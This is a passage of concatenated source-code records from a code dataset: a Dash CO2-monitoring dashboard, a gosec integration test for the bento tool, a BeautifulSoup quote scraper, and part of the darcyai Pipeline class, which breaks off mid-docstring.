update_recent_measurements(devices, interval_value):\n        out = {}\n        for dev in devices:\n            serial_number = dev[\"serial_number\"]\n            out[str(serial_number)] = models.get_values(\n                serial_number, -config.DISPLAY_LEN_SEC, 5000\n            )\n        return out, arrow.now(config.TIMEZONE).format(\n            \"YYYY-MM-DD HH:mm:ss\"\n        )\n\n    @dash_app.callback(\n        Output(\"summary-count\", \"data\"),\n        Input(\"recent-measurements\", \"data\"),\n    )\n    def update_summary_count(recent_measurements):\n        cnt_ok = cnt_warning = cnt_danger = cnt_offline = 0\n        for k, (x, y) in recent_measurements.items():\n            if not x:\n                cnt_offline += 1\n                continue\n\n            col = color_from_value(y[-1], x[-1])\n            if col == COLORS.OK:\n                cnt_ok += 1\n            elif col == COLORS.WARNING:\n                cnt_warning += 1\n            elif col == COLORS.DANGER:\n                cnt_danger += 1\n            elif col == COLORS.OFFLINE:\n                cnt_offline += 1\n\n        return cnt_ok, cnt_warning, cnt_danger, cnt_offline\n\n    @dash_app.callback(\n        Output(\"grid-content\", \"children\"),\n        Input(\"devices\", \"data\"),\n        Input(\"recent-measurements\", \"data\"),\n        Input(\"buildings\", \"data\"),\n        Input(\"view-options\", \"value\"),\n    )\n    def update_boxes(\n        devices, recent_measurements, buildings, view_options\n    ):\n        out = []\n        for dev in devices:\n            out.append(\n                build_box(\n                    dev,\n                    recent_measurements[str(dev[\"serial_number\"])],\n                    buildings,\n                    view_options,\n                )\n            )\n        return out\n\n    @dash_app.callback(\n        Output(\"grid-content\", \"className\"),\n        Input(\"view-options\", \"value\"),\n    )\n    def update_value_visibility(view_options):\n        if \"view-values\" in view_options:\n            return \"grid\"\n        return \"grid hide-bigvalue\"\n\n    @dash_app.callback(\n        Output(\"banner-summary\", \"children\"),\n        Input(\"last-update\", \"data\"),\n        Input(\"summary-count\", \"data\"),\n    )\n    def update_banner_summary(last_update, summary_count):\n        cnt_ok, cnt_warning, cnt_danger, cnt_offline = summary_count\n        return [\n            f\"{last_update}\",\n            daq.Indicator(\n                id=\"summary-ok\",\n                value=True,\n                color=COLORS.OK,\n                size=12,\n                className=\"indicator\",\n            ),\n            html.Div(\n                className=\"row metric-row\",\n                children=[\n                    f\"{cnt_ok:03d}\",\n                    daq.Indicator(\n                        id=\"summary-warning\",\n                        value=True,\n                        color=COLORS.WARNING,\n                        size=12,\n                        className=\"indicator\",\n                    ),\n                    f\"{cnt_warning:03d}\",\n                    daq.Indicator(\n                        id=\"summary-danger\",\n                        value=True,\n                        color=COLORS.DANGER,\n                        size=12,\n                        className=\"indicator\",\n                    ),\n                    f\"{cnt_danger:03d}\",\n                    daq.Indicator(\n                        id=\"summary-offline\",\n                        value=True,\n                        color=COLORS.OFFLINE,\n                        size=12,\n                        className=\"indicator\",\n                    ),\n                    f\"{cnt_offline:03d}\",\n                ],\n            ),\n        ]\n\n    dash_app.clientside_callback(\n        \"\"\"\n        function(filter_options) {\n            query = filter_options.map(s => \".\" + s);\n            query = query.reduce((a, s) => a + \", \" + s, \".building-filter-none\");\n            if (document.iso === undefined) {\n                return -1;\n            };\n            document.iso.arrange({ filter: query});\n            return 0;\n        }\n        \"\"\",\n        Output(\"n-interval-stage\", \"data\"),\n        Input(\"filter-buildings\", \"value\"),\n    )\n\n    dash_app.clientside_callback(\n        \"\"\"\n        function(value) {\n            var iso = new Isotope('.grid', {\n                // options\n                itemSelector: '.grid-item',\n                layoutMode: 'fitRows'\n            });\n\n            document.iso = iso;\n            return 1;\n        }\n        \"\"\",\n        Output(\"trash\", \"data\"),\n        Input(\"grid-content\", \"children\"),\n    )\n\n    @dash_app.callback(\n        Output(\"filter-buildings\", \"value\"),\n        Input(\"buildings\", \"data\"),\n        Input(\"app-container\", \"children\"),\n    )\n    def check_all_boxes(buildings, _aux):\n        return list(buildings.values())\n\n    dash_app.layout = html.Div(\n        id=\"big-app-container\",\n        children=[\n
            build_banner(dash_app),\n            build_header(),\n            html.Div(\n                id=\"app-container\",\n                children=[\n                    # Main app\n                    html.Div(\n                        id=\"div-loading-spinner\",\n                        children=[\n                            html.Img(\n                                id=\"loading-spinner\",\n                                src=dash_app.get_asset_url(\n                                    \"spinner.gif\"\n                                ),\n                                style={\n                                    \"width\": \"50px\",\n                                    \"height\": \"50px\",\n                                    \"vertical-align\": \"middle\",\n                                    \"display\": \"block\",\n                                    \"margin-left\": \"auto\",\n                                    \"margin-right\": \"auto\",\n                                    \"margin-top\": \"100px\",\n                                },\n                            ),\n                        ],\n                    ),\n                    html.Div(\n                        id=\"app-content\",\n                        className=\"my-hide\",\n                        children=[\n                            html.Div(\n                                id=\"grid-content\",\n                                className=\"grid\",\n                                children=[],\n                            )\n                        ],\n                    ),\n                ],\n            ),\n            dcc.Store(id=\"n-interval-stage\", data=0),\n            dcc.Store(id=\"devices\", data=[]),\n            dcc.Store(id=\"recent-measurements\", data={}),\n            dcc.Store(id=\"last-update\", data=\"n/a\"),\n            dcc.Store(id=\"buildings\", data=\"{}\"),\n            dcc.Store(id=\"summary-count\", data=(0, 0, 0, 0)),\n            dcc.Store(id=\"trash\", data=0),\n            dcc.Interval(\n                id=\"interval-component-records\",\n                interval=3 * 60 * 1000,  # in milliseconds\n                n_intervals=50,  # start at batch 50\n                # disabled=False,\n            ),\n            dcc.Interval(\n                id=\"interval-component-devices\",\n                interval=10 * 60 * 1000,  # in milliseconds\n                n_intervals=50,  # start at batch 50\n                # disabled=False,\n            ),\n        ],\n    )\n\n    dash_app.title = \"Medición de CO2 / Exactas / UBA\"\n\n    return dash_app\n","repo_name":"hgrecco/CO2-WiFi","sub_path":"dashCO2-web/dashCO2/dashapp.py","file_name":"dashapp.py","file_ext":"py","file_size_in_byte":16479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"34059952243","text":"import os\nfrom pathlib import Path\n\nfrom bento.extra.gosec import GosecTool\nfrom bento.violation import Violation\nfrom tests.test_tool import context_for\n\nTHIS_PATH = Path(os.path.dirname(__file__))\nBASE_PATH = THIS_PATH / \"..\" / \"..\" / \"..\"\n\n\ndef test_run(tmp_path: Path) -> None:\n    base_path = BASE_PATH / \"tests\" / \"integration\" / \"go\"\n    tool = GosecTool(context_for(tmp_path, GosecTool.tool_id(), base_path))\n    tool.setup()\n    violations = tool.results([base_path / \"bad.go\"])\n    assert violations == [\n        Violation(\n            tool_id=\"gosec\",\n            check_id=\"G101\",\n            path=\"bad.go\",\n            line=7,\n            column=2,\n            message=\"Potential hardcoded credentials\",\n            severity=2,\n            syntactic_context='password := \"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\\n',\n            filtered=None,\n            link=\"https://cwe.mitre.org/data/definitions/798.html\",\n        )\n    ]\n\n\ndef test_file_selection(tmp_path: Path) -> None:\n    base_path = BASE_PATH / \"tests\" / \"integration\" / \"go\"\n    tool = GosecTool(context_for(tmp_path, GosecTool.tool_id(), base_path))\n    tool.setup()\n    violations = tool.results([base_path / \"ok.go\"])\n    assert violations == []\n","repo_name":"returntocorp/bento","sub_path":"tests/extra/gosec/test_gosec.py","file_name":"test_gosec.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"35"}
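The two gosec tests above repeat the same setup and differ only in the input file and the expected result. A hedged sketch of collapsing them with pytest parametrization (imports and path constants reused from the record; the combined test name is illustrative):

import os
import pytest
from pathlib import Path
from bento.extra.gosec import GosecTool
from tests.test_tool import context_for

BASE_PATH = Path(os.path.dirname(__file__)) / ".." / ".." / ".."

@pytest.mark.parametrize(
    "source,expected_count",
    [("bad.go", 1), ("ok.go", 0)],  # expectations taken from the record's asserts
)
def test_gosec_counts(tmp_path: Path, source: str, expected_count: int) -> None:
    base_path = BASE_PATH / "tests" / "integration" / "go"
    tool = GosecTool(context_for(tmp_path, GosecTool.tool_id(), base_path))
    tool.setup()
    assert len(tool.results([base_path / source])) == expected_count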
{"seq_id":"8780349064","text":"# Scrape the authors, quotes, and tag info from the quotes site\n# http://quotes.toscrape.com/\n# Approach 2: parse with bs4\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport csv\n# 1. Simulate a browser request; returns a response object (similar to a file object)\nresponse=urlopen(\"http://quotes.toscrape.com/\")\n\n# 2. Get the page source\n# The source is returned as bytes; call decode() to convert it to a string\nhtml=response.read().decode()\n# print(html)\n\n# 3. Parse with bs4 and extract the content we need\n# (1) Create the bs object\nbs=BeautifulSoup(html,\"html.parser\")  # \"html.parser\" specifies what kind of document to parse\n# Plan: use bs to get all the quotes, all the authors, and all the keywords\n\n# First get all the quotes\n# bs.select(\"tag_name.class_value\")\nspans_quotes=bs.select(\"span.text\")\n# li_quotes=[]\n# for i in spans_quotes:\n#     li_quotes.append(i.text)\nli_quotes=[i.text for i in spans_quotes]\n# print(li_quotes)\n\n# Get all the authors\nsmall_authors=bs.select(\"small.author\")\n# li_authors=[]\n# for i in small_authors:\n#     li_authors.append(i.text)\nli_authors=[i.text for i in small_authors]\n\n# Keywords under every quote\ntemp=bs.select(\"div.tags\")\n# Every element of the list returned by bs.select can call select again\n# After selecting, the text attribute of each element gives the content between the tags\nli_tags=[]\nfor i in temp:\n    aes=i.select(\"a.tag\")\n    # print(\"keywords under the current quote\")\n    tag_str=\"\"\n    for j in aes:\n        # print(j.text)\n        tag_str+=str(j.text)+\",\"\n    # print(tag_str)\n    li_tags.append(tag_str)\n\n\n# Combine and write out\nwith open(\"c:/quotes3.csv\",\"wt\",newline=\"\") as f:\n    writer=csv.writer(f)\n    writer.writerow([\"quote\",\"author\",\"tag keywords\"])\n    for i in range(len(spans_quotes)):\n        one=[li_quotes[i],li_authors[i],li_tags[i]]\n        # print(one)\n        writer.writerow(one)","repo_name":"github19970909/python1902","sub_path":"day10/day9homework3.py","file_name":"day9homework3.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
{"seq_id":"36940320768","text":"import json\nimport os\nimport pathlib\nimport platform\nimport sys\nimport threading\nimport time\nfrom collections import OrderedDict\nfrom collections.abc import Iterable\nfrom flask import Flask, request, Response, jsonify, render_template\nfrom json import JSONEncoder\nfrom multiprocessing.pool import ThreadPool\nfrom signal import SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, signal\nfrom typing import Callable, Any, Dict, Tuple, Union, List\nfrom unittest.mock import sentinel\nfrom waitress import serve\n\nfrom darcyai.config import Config, RGB\nfrom darcyai.config_registry import ConfigRegistry\nfrom darcyai.cyclic_toposort import acyclic_toposort\nfrom darcyai.input.input_multi_stream import InputMultiStream\nfrom darcyai.input.input_stream import InputStream\nfrom darcyai.log import setup_custom_logger\nfrom darcyai.output.output_stream import OutputStream\nfrom darcyai.perceptor.perceptor import Perceptor\nfrom darcyai.perceptor.perceptor_node import PerceptorNode\nfrom darcyai.perception_object_model import PerceptionObjectModel\nfrom darcyai.processing_engine import ProcessingEngine\nfrom darcyai.stream_data import StreamData\nfrom darcyai.utils import validate_not_none, validate_type, validate\n\n\nclass Pipeline():\n    \"\"\"\n    The Pipeline class is the main class of the darcyai package.\n\n    # Arguments\n    input_stream (InputStream): The input stream to be used by the pipeline.\n    input_data_history_len (int): The number of input data items to be\n        stored in the history. Defaults to `1`.\n    pom_history_len (int): The number of POM items to be stored in the\n        history. Defaults to `1`.\n    metrics_history_len (int): The number of metrics items to be stored in\n        the history. Defaults to `1`.\n    num_of_edge_tpus (int): The number of Edge TPUs. Defaults to `1`.\n    perceptor_error_handler_callback (Callable[[str, Exception], None]): The\n        callback function to be called when a Perceptor throws\n        an exception. Defaults to `None`.\n    output_stream_error_handler_callback (Callable[[str, Exception], None]): The\n        callback function to be called when an OutputStream\n        throws an exception. Defaults to `None`.\n    input_stream_error_handler_callback (Callable[[Exception], None]): The\n        callback function to be called when an InputStream throws\n        an exception. 
Defaults to `None`.\n input_stream_error_handler_callback (Callable[[Exception], None]): The\n callback function to be called when an InputStream throws\n an exception. Defaults to `None`.\n perception_completion_callback (Callable[[PerceptionObjectModel], None]): The\n callback function to be called when all the perceptors have completed\n processing. Defaults to `None`.\n universal_rest_api (bool): Whether or not to use the universal\n REST API. Defaults to `False`.\n rest_api_base_path (str): The base path of the REST API. Defaults to `/`.\n rest_api_flask_app (Flask): The Flask application to be used by\n the REST API. Defaults to `None`.\n rest_api_port (int): The port of the REST API. Defaults to `5000`.\n rest_api_host (str): The host of the REST API. Defaults to `localhost`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera,\n ... input_data_history_len=10,\n ... pom_history_len=10,\n ... metrics_history_len=10,\n ... num_of_edge_tpus=1,\n ... perceptor_error_handler_callback=None,\n ... output_stream_error_handler_callback=None,\n ... input_stream_error_handler_callback=None,\n ... perception_completion_callback=None,\n ... pulse_completion_callback=None,\n ... universal_rest_api=True,\n ... rest_api_base_path=\"/\",\n ... rest_api_flask_app=None,\n ... rest_api_port=5000,\n ... rest_api_host=\"localhost\")\n ```\n \"\"\"\n def __init__(self,\n input_stream: InputStream,\n input_data_history_len: int = 50,\n pom_history_len: int = 50,\n metrics_history_len: int = 50,\n num_of_edge_tpus: int = 1,\n perceptor_error_handler_callback: Callable[[str, Exception], None] = None,\n output_stream_error_handler_callback: Callable[[str, Exception], None] = None,\n input_stream_error_handler_callback: Callable[[Exception], None] = None,\n perception_completion_callback: Callable[[PerceptionObjectModel], None] = None,\n pulse_completion_callback: Callable[[PerceptionObjectModel], None] = None,\n universal_rest_api: bool = False,\n rest_api_base_path: str = None,\n rest_api_flask_app: Flask = None,\n rest_api_port: int = None,\n rest_api_host: str = None):\n validate_not_none(input_stream, \"input_stream is required\")\n validate_type(input_stream, (InputStream, InputMultiStream),\n \"input_stream must be an instance of InputStream\")\n\n validate_type(\n num_of_edge_tpus,\n int,\n \"num_of_edge_tpus must be an integer\")\n validate(\n num_of_edge_tpus > 0,\n \"num_of_edge_tpus must be greater then 0\")\n\n if perceptor_error_handler_callback is not None:\n validate(callable(perceptor_error_handler_callback),\n \"perceptor_error_handler_callback must be a function\")\n\n if output_stream_error_handler_callback is not None:\n validate(callable(output_stream_error_handler_callback),\n \"output_stream_error_handler_callback must be a function\")\n\n if input_stream_error_handler_callback is not None:\n validate(callable(input_stream_error_handler_callback),\n \"input_stream_error_handler_callback must be a function\")\n\n self.__set_perception_completion_callback(perception_completion_callback)\n\n if pulse_completion_callback is not None:\n validate(callable(pulse_completion_callback),\n \"pulse_completion_callback must be a function\")\n self.__pulse_completion_callback = pulse_completion_callback\n\n if universal_rest_api:\n if rest_api_flask_app is not None:\n validate_type(\n rest_api_flask_app,\n Flask,\n 
\"rest_api_flask_app must be of type Flask\")\n else:\n validate_not_none(rest_api_port, \"rest_api_port is required\")\n validate_type(\n rest_api_port,\n int,\n \"rest_api_port must be of type int\")\n validate(\n 0 <= rest_api_port <= 65535,\n \"rest_api_port must be between 0 and 65535\")\n\n if rest_api_host is None:\n self.__host = \"*\"\n else:\n validate_type(\n rest_api_host,\n str,\n \"rest_api_host must be a string\")\n self.__host = rest_api_host\n\n validate_not_none(\n rest_api_base_path,\n \"rest_api_base_path is required\")\n validate_type(\n rest_api_base_path,\n str,\n \"rest_api_base_path must be a string\")\n\n self.__flask_app = rest_api_flask_app\n self.__port = rest_api_port\n self.__path = rest_api_base_path\n\n self.__input_stream = input_stream\n\n self.__num_of_edge_tpus = num_of_edge_tpus\n\n self.__input_data_history_len = input_data_history_len\n self.__input_data_history = OrderedDict()\n\n self.__pom_history_len = pom_history_len\n self.__pom_history = OrderedDict()\n\n self.__metrics_history = OrderedDict()\n self.__metrics_history_len = metrics_history_len\n self.__average_pipeline_cycle_execution = 0\n self.__average_perceptor_execution = {}\n self.__perceptors_execution_time = {}\n\n self.__perceptor_error_handler_callback = perceptor_error_handler_callback\n self.__output_stream_error_handler_callback = output_stream_error_handler_callback\n self.__input_stream_error_handler_callback = input_stream_error_handler_callback\n\n self.__perceptors = {}\n self.__output_streams = {}\n self.__processing_engine = ProcessingEngine(self.__num_of_edge_tpus)\n self.__thread_pool = ThreadPool(10)\n self.__pom = PerceptionObjectModel()\n self.__pulse_number = 0\n self.__perceptor_config_registry = {}\n self.__perceptor_config_schema = {}\n self.__output_config_registry = {}\n self.__output_config_schema = {}\n self.__logger = setup_custom_logger(__name__)\n\n self.__running = False\n\n if universal_rest_api:\n threading.Thread(target=self.__start_api_server).start()\n\n signals = [SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM]\n #pylint: disable=import-outside-toplevel\n if platform.system() == \"Windows\":\n from signal import SIGBREAK\n signals.append(SIGBREAK)\n else:\n from signal import SIGQUIT\n signals.append(SIGQUIT)\n for sig in signals:\n signal(sig, self.__kill)\n\n def num_of_edge_tpus(self) -> int:\n \"\"\"\n Gets the number of Edge TPUs in the pipeline.\n\n # Returns\n int: The number of Edge TPUs in the pipeline.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.num_of_edge_tpus()\n ```\n \"\"\"\n return self.__num_of_edge_tpus\n\n def add_perceptor(self,\n name: str,\n perceptor: Perceptor,\n input_callback: Callable[[StreamData,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n output_callback: Callable[[Any,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n parent: str = None,\n multi: bool = False,\n accelerator_idx: int = 0,\n default_config: Dict[str, Any] = None) -> None:\n \"\"\"\n Adds a new Perceptor to the pipeline.\n\n # Arguments\n name (str): The name of the Perceptor (must be a valid variable name).\n perceptor (Perceptor): The Perceptor to be added.\n input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor receives input data.\n Defaults 
to `None`.\n output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor produces output data.\n Defaults to `None`.\n parent (str): The name of the parent Perceptor. Defaults to `None`.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n Defaults to `0`.\n default_config (Dict[str, Any]): The default configuration for the Perceptor.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_perceptor(name=\"perceptor\",\n ... perceptor=MyPerceptor(),\n ... input_callback=None,\n ... output_callback=None,\n ... parent=\"input_stream\",\n ... multi=True,\n ... accelerator_idx=0,\n ... default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n self.__validate_perceptor(\n name=name,\n perceptor=perceptor,\n input_callback=input_callback,\n output_callback=output_callback,\n accelerator_idx=accelerator_idx,\n default_config=default_config)\n\n if parent is not None and parent not in self.__perceptors:\n raise ValueError(\n f\"perceptor with name '{parent}' does not exist\")\n\n perceptor_node = PerceptorNode(\n name,\n perceptor,\n input_callback,\n output_callback,\n multi,\n accelerator_idx)\n\n self.__perceptors[name] = perceptor_node\n if parent is not None:\n self.__perceptors[parent].add_child_perceptor(name)\n\n self.__create_config_registry_for_perceptor(\n name, perceptor, default_config)\n\n def add_perceptor_before(self,\n name_to_insert_before: str,\n name: str,\n perceptor: Perceptor,\n input_callback: Callable[[StreamData,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n output_callback: Callable[[Any,\n PerceptionObjectModel,\n ConfigRegistry],\n Any] = None,\n multi: bool = False,\n accelerator_idx: int = 0,\n default_config: dict = None) -> None:\n \"\"\"\n Adds a new Perceptor to the pipeline.\n\n # Arguments\n name_to_insert_before (str): The name of the Perceptor to insert the new Perceptor\n before.\n name (str): The name of the Perceptor.\n perceptor (Perceptor): The Perceptor to be added.\n input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor receives input data.\n Defaults to `None`.\n output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n callback function to be called when the Perceptor produces output data.\n Defaults to `None`.\n multi (bool): Whether or not to run the perceptor for each item in input data.\n Defaults to `False`.\n accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n Defaults to `0`.\n default_config (dict): The default configuration for the Perceptor.\n Defaults to `None`.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.add_perceptor_before(name=\"perceptor\",\n ... name_to_insert_before=\"child_input_stream\",\n ... perceptor=MyPerceptor(),\n ... input_callback=None,\n ... output_callback=None,\n ... 
multi=True,\n        ...                               accelerator_idx=0,\n        ...                               default_config={\"key\": \"value\"})\n        ```\n        \"\"\"\n        self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n        self.__validate_perceptor(\n            name=name,\n            perceptor=perceptor,\n            input_callback=input_callback,\n            output_callback=output_callback,\n            accelerator_idx=accelerator_idx,\n            default_config=default_config)\n\n        validate_not_none(\n            name_to_insert_before,\n            \"name_to_insert_before is required\")\n        validate_type(\n            name_to_insert_before,\n            str,\n            \"name_to_insert_before must be a string\")\n        validate(\n            name_to_insert_before in self.__perceptors,\n            f\"perceptor with name '{name_to_insert_before}' does not exist\")\n        validate(name_to_insert_before != name,\n                 \"name_to_insert_before cannot be the same as name\")\n\n        perceptor_node = PerceptorNode(\n            name,\n            perceptor,\n            input_callback,\n            output_callback,\n            multi,\n            accelerator_idx)\n\n        self.__perceptors[name] = perceptor_node\n\n        parents = self.__get_perceptor_parents(name_to_insert_before)\n        for parent in parents:\n            self.__perceptors[parent].add_child_perceptor(name)\n            self.__perceptors[parent].remove_child_perceptor(\n                name_to_insert_before)\n\n        self.__perceptors[name].add_child_perceptor(name_to_insert_before)\n\n        self.__create_config_registry_for_perceptor(\n            name, perceptor, default_config)\n\n    def add_perceptor_after(self,\n                            name_to_insert_after: str,\n                            name: str,\n                            perceptor: Perceptor,\n                            input_callback: Callable[[StreamData,\n                                                      PerceptionObjectModel,\n                                                      ConfigRegistry],\n                                                     Any] = None,\n                            output_callback: Callable[[Any,\n                                                       PerceptionObjectModel,\n                                                       ConfigRegistry],\n                                                      Any] = None,\n                            multi: bool = False,\n                            accelerator_idx: int = 0,\n                            default_config: dict = None) -> None:\n        \"\"\"\n        Adds a new Perceptor to the pipeline, inserting it after an existing Perceptor.\n\n        # Arguments\n        name_to_insert_after (str): The name of the Perceptor to insert the new Perceptor\n            after.\n        name (str): The name of the Perceptor.\n        perceptor (Perceptor): The Perceptor to be added.\n        input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n            callback function to be called when the Perceptor receives input data.\n            Defaults to `None`.\n        output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n            callback function to be called when the Perceptor produces output data.\n            Defaults to `None`.\n        multi (bool): Whether or not to run the perceptor for each item in input data.\n            Defaults to `False`.\n        accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n            Defaults to `0`.\n        default_config (dict): The default configuration for the Perceptor.\n            Defaults to `None`.\n\n        # Examples\n        ```python\n        >>> from darcyai.input.camera_stream import CameraStream\n        >>> from darcyai.pipeline import Pipeline\n\n        >>> camera = CameraStream(video_device=\"/dev/video0\")\n        >>> pipeline = Pipeline(input_stream=camera)\n        >>> pipeline.add_perceptor_after(name=\"perceptor\",\n        ...                              name_to_insert_after=\"parent_input_stream\",\n        ...                              perceptor=MyPerceptor(),\n        ...                              input_callback=None,\n        ...                              output_callback=None,\n        ...                              multi=True,\n        ...                              accelerator_idx=0,\n        ...                              default_config={\"key\": \"value\"})\n        ```\n        \"\"\"\n        self.add_perceptor(\n            name=name,\n            perceptor=perceptor,\n            input_callback=input_callback,\n            output_callback=output_callback,\n            parent=name_to_insert_after,\n            multi=multi,\n            accelerator_idx=accelerator_idx,\n            default_config=default_config)\n\n    def add_parallel_perceptor(self,\n                               name_to_insert_in_parallel_with: str,\n                               name: str,\n                               perceptor: Perceptor,\n                               input_callback: Callable[[StreamData,\n                                                         PerceptionObjectModel,\n                                                         ConfigRegistry],\n                                                        Any] = None,\n                               output_callback: Callable[[Any,\n                                                          PerceptionObjectModel,\n                                                          ConfigRegistry],\n                                                         Any] = None,\n                               multi: bool = False,\n                               accelerator_idx: int = 0,\n                               default_config: dict = None) -> None:\n        \"\"\"\n        Adds a new Perceptor to the pipeline, running it in parallel with an existing\n        Perceptor.\n\n        # Arguments\n        name_to_insert_in_parallel_with (str): The name of the Perceptor to insert the\n            new Perceptor in parallel with.\n        name (str): The name of the Perceptor.\n        perceptor (Perceptor): The Perceptor to be added.\n        input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The\n            callback function to be called when the Perceptor receives input data.\n            Defaults to `None`.\n        output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The\n            callback function to be called when the Perceptor produces output data.\n            Defaults to `None`.\n        multi (bool): Whether or not to run the perceptor for each item in input data.\n            Defaults to `False`.\n        accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.\n            Defaults to `0`.\n        default_config (dict): The default configuration for the Perceptor.\n            Defaults to `None`.\n\n        # Examples\n        ```python\n        >>> from darcyai.input.camera_stream import CameraStream\n        >>> from darcyai.pipeline import Pipeline\n\n        >>> camera = CameraStream(video_device=\"/dev/video0\")\n        >>> pipeline = Pipeline(input_stream=camera)\n        >>> pipeline.add_parallel_perceptor(name=\"perceptor\",\n        ...                                 name_to_insert_in_parallel_with=\"parallel_input_stream\",\n        ...                                 perceptor=MyPerceptor(),\n        ...                                 input_callback=None,\n        ...                                 output_callback=None,\n        ...                                 multi=True,\n        ...                                 accelerator_idx=0,\n        ...                                 default_config={\"key\": \"value\"})\n        ```\n        \"\"\"\n        self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n        self.__validate_perceptor(\n            name=name,\n            perceptor=perceptor,\n            input_callback=input_callback,\n            output_callback=output_callback,\n            accelerator_idx=accelerator_idx,\n            default_config=default_config)\n\n        validate_not_none(\n            name_to_insert_in_parallel_with,\n            \"name_to_insert_in_parallel_with is required\")\n        validate_type(name_to_insert_in_parallel_with, str,\n                      \"name_to_insert_in_parallel_with must be a string\")\n        validate(\n            name_to_insert_in_parallel_with in self.__perceptors,\n            f\"perceptor with name '{name_to_insert_in_parallel_with}'\" + \\\n            \" does not exist\")\n        validate(name_to_insert_in_parallel_with != name,\n                 \"name_to_insert_in_parallel_with cannot be the same as name\")\n\n        perceptor_node = PerceptorNode(\n            name,\n            perceptor,\n            input_callback,\n            output_callback,\n            multi,\n            accelerator_idx)\n\n        self.__perceptors[name] = perceptor_node\n\n        parents = self.__get_perceptor_parents(name_to_insert_in_parallel_with)\n        for parent in parents:\n            self.__perceptors[parent].add_child_perceptor(name)\n\n        self.__create_config_registry_for_perceptor(\n            name, perceptor, default_config)\n
default_config={\"key\": \"value\"})\n ```\n \"\"\"\n self.__logger.debug(\"Adding Perceptor '%s' to Pipeline\", name)\n\n self.__validate_perceptor(\n name=name,\n perceptor=perceptor,\n input_callback=input_callback,\n output_callback=output_callback,\n accelerator_idx=accelerator_idx,\n default_config=default_config)\n\n validate_not_none(\n name_to_insert_in_parallel_with,\n \"name_to_insert_in_parallel_with is required\")\n validate_type(name_to_insert_in_parallel_with, str,\n \"name_to_insert_in_parallel_with must be a string\")\n validate(\n name_to_insert_in_parallel_with in self.__perceptors,\n f\"perceptor with name '{name_to_insert_in_parallel_with}'\" + \\\n \"does not exist\")\n validate(name_to_insert_in_parallel_with != name,\n \"name_to_insert_in_parallel_with cannot be the same as name\")\n\n perceptor_node = PerceptorNode(\n name,\n perceptor,\n input_callback,\n output_callback,\n multi,\n accelerator_idx)\n\n self.__perceptors[name] = perceptor_node\n\n parents = self.__get_perceptor_parents(name_to_insert_in_parallel_with)\n for parent in parents:\n self.__perceptors[parent].add_child_perceptor(name)\n\n self.__create_config_registry_for_perceptor(\n name, perceptor, default_config)\n\n def update_input_stream(self, input_stream: InputStream) -> None:\n \"\"\"\n Updates the input stream of the pipeline.\n\n # Arguments\n input_stream (InputStream): The input stream to be added.\n\n # Examples\n ```python\n >>> from darcyai.input.camera_stream import CameraStream\n >>> from darcyai.pipeline import Pipeline\n\n >>> camera = CameraStream(video_device=\"/dev/video0\")\n >>> pipeline = Pipeline(input_stream=camera)\n >>> pipeline.update_input_stream(camera)\n \"\"\"\n self.__logger.debug(\"Adding Input Stream of type '%s' to Pipeline\",\n input_stream.__class__.__name__)\n\n validate_not_none(input_stream, \"input_stream is required\")\n validate_type(input_stream, InputStream, \"input_stream must be an InputStream\")\n\n if self.__running:\n raise RuntimeError(\"Pipeline is already running\")\n\n self.__input_stream = input_stream\n\n def add_output_stream(self,\n name: str,\n callback: Callable[[PerceptionObjectModel,\n StreamData],\n Any],\n output_stream: OutputStream,\n default_config: dict = None) -> None:\n \"\"\"\n Adds an OutputStream to the pipeline.\n\n # Arguments\n name (str): The name of the OutputStream.\n callback (Callable[[PerceptionObjectModel, StreamData], Any]): A callback function\n that is called whith PerceptionObjectModel object and returns the data that\n the output stream must process.\n output_stream (OutputStream): The OutputStream to be added.\n 